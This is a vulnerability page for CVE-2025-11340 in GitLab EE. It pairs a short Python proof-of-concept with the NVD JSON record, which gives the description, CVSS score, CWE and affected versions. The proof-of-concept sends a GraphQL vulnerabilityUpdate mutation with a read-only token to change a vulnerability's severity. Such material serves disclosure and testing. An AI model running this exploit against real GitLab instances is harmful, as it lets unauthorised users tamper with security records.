CVE-2025-11340

# CVE-2025-11340 PoC - GitLab EE GraphQL Unauthorized Mutation on Vulnerability Records # This PoC demonstrates how a user with read-only API token can perform # unauthorized write operations on vulnerability records import requests # GitLab instance URL and read-only API token GITLAB_URL = "https://gitlab.example.com" API_TOKEN = "glpat-xxxxxxxxxxxxxxxxxxxx" # read_api scope token # GraphQL endpoint GRAPHQL_URL = f"{GITLAB_URL}/api/graphql" # Headers for GraphQL request headers = { "Authorization": f"Bearer {API_TOKEN}", "Content-Type": "application/json" } # Exploit: Attempt to update a vulnerability record using read-only token # This mutation should be rejected but is accepted due to incorrect scope validation mutation = """ mutation VulnerabilityUpdate($id: VulnerabilityID!, $severity: VulnerabilitySeverity) { vulnerabilityUpdate(input: { id: $id, severity: $severity }) { vulnerability { id severity } errors } } """ variables = { "id": "gid://gitlab/Vulnerability/123", "severity": "CRITICAL" } response = requests.post( GRAPHQL_URL, json={"query": mutation, "variables": variables}, headers=headers, verify=False ) print(f"Status Code: {response.status_code}") print(f"Response: {response.json()}") # If vulnerable, the mutation succeeds and modifies the vulnerability record # despite the token having only read_api scope

{"cve": {"id": "CVE-2025-11340", "sourceIdentifier": "[email protected]", "published": "2025-10-09T12:15:35.233", "lastModified": "2025-10-20T21:00:37.130", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "GitLab has remediated an issue in GitLab EE affecting all versions from 18.3 to 18.3.4, 18.4 to 18.4.2 that, under certain conditions, could have allowed authenticated users with read-only API tokens to perform unauthorized write operations on vulnerability records by exploiting incorrectly scoped GraphQL mutations."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:H/A:N", "baseScore": 7.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 4.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:*", "versionStartIncluding": "18.3.0", "versionEndExcluding": "18.3.4", "matchCriteriaId": "536C1DFE-B81E-4E5E-A979-EBB8AEB62F4C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "18.3.0", "versionEndExcluding": "18.3.4", "matchCriteriaId": "15A762DA-E645-404C-B831-A63171FF3EF2"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:*", "versionStartIncluding": "18.4.0", "versionEndExcluding": "18.4.2", "matchCriteriaId": "A0684F06-FCCA-400A-AB87-BB9B9F906187"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "18.4.0", "versionEndExcluding": "18.4.2", "matchCriteriaId": "719CBD84-A5F7-4332-8C37-D68474A2FB70"}]}]}], "references": [{"url": "https://about.gitlab.com/releases/2025/10/08/patch-release-gitlab-18-4-2-released/", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://gitlab.com/gitlab-org/gitlab/-/issues/567847", "source": "[email protected]", "tags": ["Broken Link"]}]}}